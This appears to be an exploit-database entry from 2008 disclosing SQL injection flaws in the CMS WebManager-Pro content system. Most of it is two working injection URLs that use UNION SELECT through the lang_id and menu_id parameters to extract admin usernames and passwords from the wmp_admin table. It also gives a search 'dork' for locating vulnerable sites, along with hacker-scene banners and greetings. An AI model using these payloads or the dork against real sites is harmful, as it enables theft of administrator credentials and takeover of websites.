id: 3037
date: 05/17/2008
title: CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities
author: dun
cves: 

================================================================
CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities
================================================================



  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun ]

 ##################################################################
 #  [  CMS Webmanager-pro ]   Remote SQL Injection Vulnerability  #
 ##################################################################
 #
 # Script site:  http://webmanager-pro.com/
 # 
 # Vuln: 
 # http://site.com/index.php?lang_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*
 # http://site.com/index.php?menu_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*
 #      
 # Dork example: "CMS Webmanager-pro"
 #
 ###############################################
 # Greetz: D3m0n_DE * sid_psycho * and otherz..
 ###############################################



#  0day.today [2023-03-24]  #